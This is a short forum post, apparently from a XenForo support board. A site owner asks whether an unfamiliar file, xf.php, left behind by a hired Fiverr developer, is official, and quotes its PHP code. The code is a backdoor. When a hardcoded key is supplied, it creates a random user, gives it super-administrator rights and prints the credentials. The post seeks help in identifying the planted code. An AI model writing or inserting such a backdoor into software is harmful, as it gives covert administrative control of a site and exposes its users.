MR X
Active member
so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.
that is just the jist of what all was in it.
appreciate some support thank you.
PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
// Create a new user with random credentials
$registration = \XF::service('XF:User\Registration');
$input['username'] = $randomString;
$input['email'] = "$randomString@gmail.com";
$input['password'] = $randomString;
$registration->setFromInput($input);
$registration->skipEmailConfirmation(true);
$user = $registration->save();
// Force admin privileges
$user->secondary_group_ids = [3, 8, 5]; // Elevated groups
$admin = \XF::app()->em()->create('XF:Admin');
$admin->user_id = $user->user_id;
$input['is_super_admin'] = true;
$form->basicEntitySave($admin, $input);
$form->run();
echo $randomString; // Prints the generated credentials
}that is just the jist of what all was in it.
appreciate some support thank you.
.